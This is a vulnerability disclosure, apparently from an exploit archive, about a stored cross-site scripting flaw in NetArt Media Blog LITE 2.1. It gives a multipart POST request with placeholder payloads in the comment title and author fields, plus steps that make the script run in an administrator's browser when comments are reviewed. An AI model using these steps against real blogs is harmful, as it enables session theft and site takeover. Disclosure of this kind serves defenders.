NetArt Media Blog LITE version 2.1 suffers from a persistent cross site scripting vulnerability.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Vulnerability ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr :
β Website : https://www.netartmedia.net/blog-lite β
β Vendor : NetArt Media β
β Software : Blog LITE 2.1 β
β Vuln Type: Stored XSS β
β Impact : Manipulate the content of the site β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β Allow Attacker to inject malicious code into website, give ability to steal sensitive β
β information, manipulate data, and launch additional attacks. β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2023 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
## Stored XSS
---------------------------------------------------------
POST /blog/index.php HTTP/2
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="title"
[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="content"
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="author"
[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="email"
-----------------------------401019026540470155022776857270
## Steps to Reproduce:
1. Visit Any Category on the Blog
2. Write a comment (as Guest)
3. Inject your [XSS Payload] in "Comment Title"
4. Inject your [XSS Payload] in "Your Name"
5. Submit
6. By default the Blog Disable your comment for Admin Check
7. Admin Check the [BLOG POSTS] in the Administration Panel on this Path (https://website/blog/admin/index.php?page=posts)
8. When the Admin check the comments on this Path (https://website/blog/admin/index.php?page=comments&id=2)
9. XSS Will Fire and Executed on his Browser
[-] Done